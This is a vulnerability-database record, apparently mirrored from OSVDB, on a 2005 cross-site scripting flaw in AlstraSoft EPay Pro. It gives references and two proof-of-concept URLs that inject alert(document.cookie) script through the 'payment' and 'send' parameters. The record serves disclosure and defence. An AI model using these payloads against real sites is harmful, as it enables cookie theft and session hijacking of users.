{"edition": 1, "title": "AlstraSoft EPay Pro order_num Multiple Variable XSS", "bulletinFamily": "software", "published": "2005-04-01T07:54:57", "lastseen": "2017-04-28T13:20:11", "modified": "2005-04-01T07:54:57", "reporter": "OSVDB", "viewCount": 0, "href": "https://vulners.com/osvdb/OSVDB:15228", "description": "## Manual Testing Notes\nhttp://[victim]/epal/?order_num=crap&payment=\"><script>alert(document.cookie)</script>&send=first&send=regular&send=priority&send=express\n\nhttp://[victim]/epal/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\n## References:\nVendor URL: http://www.alstrasoft.com/\nSecurity Tracker: 1013627\n[Secunia Advisory ID:14802](https://secuniaresearch.flexerasoftware.com/advisories/14802/)\n[Related OSVDB ID: 15227](https://vulners.com/osvdb/OSVDB:15227)\nOther Advisory URL: http://digitalparadox.org/advisories/aep.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0022.html\n", "affectedSoftware": [], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-04-28T13:20:11", "rev": 2}, "dependencies": {"references": [], "modified": "2017-04-28T13:20:11", "rev": 2}, "vulnersScore": 0.2}, "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "OSVDB:15228", "immutableFields": []}

{}